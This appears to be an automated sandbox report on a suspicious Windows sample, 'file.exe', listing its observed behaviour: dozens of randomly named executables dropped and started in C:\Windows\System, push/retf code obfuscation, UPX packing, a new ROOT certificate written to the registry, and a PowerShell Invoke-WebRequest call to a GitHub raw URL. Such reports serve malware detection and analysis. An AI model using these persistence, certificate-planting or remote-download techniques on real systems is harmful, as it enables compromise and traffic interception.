Source: C:\Windows\System\FGSooXz.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\mKdsHiQ.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\mKdsHiQ.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\nWSykjl.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\nWSykjl.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\LKurWpq.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\LKurWpq.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\iHSYLud.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\iHSYLud.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\tyQdqmC.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\tyQdqmC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\sabRErB.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\sabRErB.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\ZTSJHKb.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\ZTSJHKb.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\xNhRSWh.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\xNhRSWh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\jtnQpnb.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\jtnQpnb.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\hEUEsIC.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\hEUEsIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System\UqXZtcb.exe	Section loaded: apphelp.dll
Source: C:\Windows\System\UqXZtcb.exe	Section loaded: kernel.appcore.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: file.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: file.exe

Static file information: File size 1262731 > 1048576

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\System\xIpouRJ.exe

4_2_00007FF66685EBF0

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System\xIpouRJ.exe	Code function: 4_2_00007FF666807FA3 push qword ptr [00007FF5F1C8AA28h]; retf	4_2_00007FF666807FA9
Source: C:\Windows\System\xIpouRJ.exe	Code function: 4_2_00007FF666808072 push qword ptr [00007FF5F1C8AAF7h]; retf	4_2_00007FF666808078
Source: C:\Windows\System\ERbKWDm.exe	Code function: 5_2_00007FF67DBD8072 push qword ptr [00007FF60905AAF7h]; retf	5_2_00007FF67DBD8078
Source: C:\Windows\System\ERbKWDm.exe	Code function: 5_2_00007FF67DBD7FA3 push qword ptr [00007FF60905AA28h]; retf	5_2_00007FF67DBD7FA9
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3B68072 push qword ptr [00007FF74EFEAAF7h]; retf	6_2_00007FF7C3B68078
Source: C:\Windows\System\wHnuprt.exe	Code function: 6_2_00007FF7C3B67FA3 push qword ptr [00007FF74EFEAA28h]; retf	6_2_00007FF7C3B67FA9
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA97FA3 push qword ptr [00007FF649F1AA28h]; retf	7_2_00007FF6BEA97FA9
Source: C:\Windows\System\uxMRJKa.exe	Code function: 7_2_00007FF6BEA98072 push qword ptr [00007FF649F1AAF7h]; retf	7_2_00007FF6BEA98078
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3CE8072 push qword ptr [00007FF63F16AAF7h]; retf	8_2_00007FF6B3CE8078
Source: C:\Windows\System\bJVoOik.exe	Code function: 8_2_00007FF6B3CE7FA3 push qword ptr [00007FF63F16AA28h]; retf	8_2_00007FF6B3CE7FA9
Source: C:\Windows\System\wkazDeV.exe	Code function: 9_2_00007FF68B318072 push qword ptr [00007FF61679AAF7h]; retf	9_2_00007FF68B318078
Source: C:\Windows\System\wkazDeV.exe	Code function: 9_2_00007FF68B317FA3 push qword ptr [00007FF61679AA28h]; retf	9_2_00007FF68B317FA9
Source: C:\Windows\System\VWrcuzM.exe	Code function: 10_2_00007FF748337FA3 push qword ptr [00007FF6D37BAA28h]; retf	10_2_00007FF748337FA9
Source: C:\Windows\System\VWrcuzM.exe	Code function: 10_2_00007FF748338072 push qword ptr [00007FF6D37BAAF7h]; retf	10_2_00007FF748338078

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\XZxtJFw.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\sabRErB.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\oxCQuSo.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\fpHmIIc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\xIpouRJ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\mKdsHiQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\ZTSJHKb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\hAOVVjq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\wJNkgSa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\bJVoOik.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\tyQdqmC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\defQfgC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\VWrcuzM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\LKurWpq.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\jtnQpnb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\mbSqRHL.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\FGSooXz.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\UqXZtcb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\WCbcoxD.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\imwRXsl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\nWSykjl.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\eVVPPqR.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\wHnuprt.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\VFkciqc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\iHSYLud.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\WLWcTVM.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\hEUEsIC.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\Csmwgyb.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\xNhRSWh.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\QWtCxan.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\ERbKWDm.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\MwFvbxc.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\vyHGCnK.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\uxMRJKa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\wkazDeV.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\VHwkuIa.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\sdTevgk.exe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Executable created and started: C:\Windows\System\bzSbRdi.exe	Jump to behavior

Installs new ROOT certificates

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Drops PE files

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kYjPKaN.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\RcAqfwv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PaGFrFU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\OpMgkKg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MydOwjq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HKdVaSy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\FgiIXgf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NyhRMmW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rgBmwKj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\QdDnaqt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BpqsHCR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gKbbPbF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\kFAVWnk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\roZGxps.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\SAfbgcC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XWzPvUm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wkIkkhX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UQkDiSP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\AQSffhY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uRBSbtU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YYCxOQh.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rYIlnZs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XZxtJFw.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\dCnJkoQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BwBweqn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\pzbELEW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qdErmhf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\rQJmlSe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\qQyXqOp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fIqTNJz.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WlVmTit.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xAzCYwU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eXUokzg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IpqVIyY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oUGjnOU.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sabRErB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BwjWQVv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\snZBbmy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\eVVPPqR.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KEULPTl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mgbtojr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UmvuxvA.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\Uvtpjkd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\NLJeLdM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ORmCcsC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xneUGSK.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\KVgdAzq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jYFqRXp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\XAgYYqB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WTLAzgJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\whRtinB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wHnuprt.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mXElbHo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VgNRTsd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\DbVBXPi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uaJCfvY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\jAqlPqL.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JKpmIVS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wibjUVa.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\oxCQuSo.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\GmNUXAr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\IofoOIp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\CWLRJYu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\HnTfvAZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\delwiax.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EkcZQPq.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fylerHE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VFkciqc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fpHmIIc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\vUKZkjM.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\yXkrKHV.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VwIvzCk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VdwdSnC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\fyffsXe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\TscCBWf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\iHSYLud.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wJZTVhW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\gCZFmUf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\JUxucoT.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YFzrUDj.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\bpCJdvZ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\VGaSwYr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UlGsoAn.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\uSdaSKW.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YHgRCCe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\YnfMwga.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\UExJWUr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PLFTiIe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\EMuPVcI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\xIpouRJ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wpjxcMS.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\LOvnxUx.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\wCJLXKb.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\sXBohAC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\ABievJY.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\PrFZfUv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\MKAkyBP.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\mKdsHiQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\BNgUfBr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\System\WLWcTVM.exe	Jump to dropped file
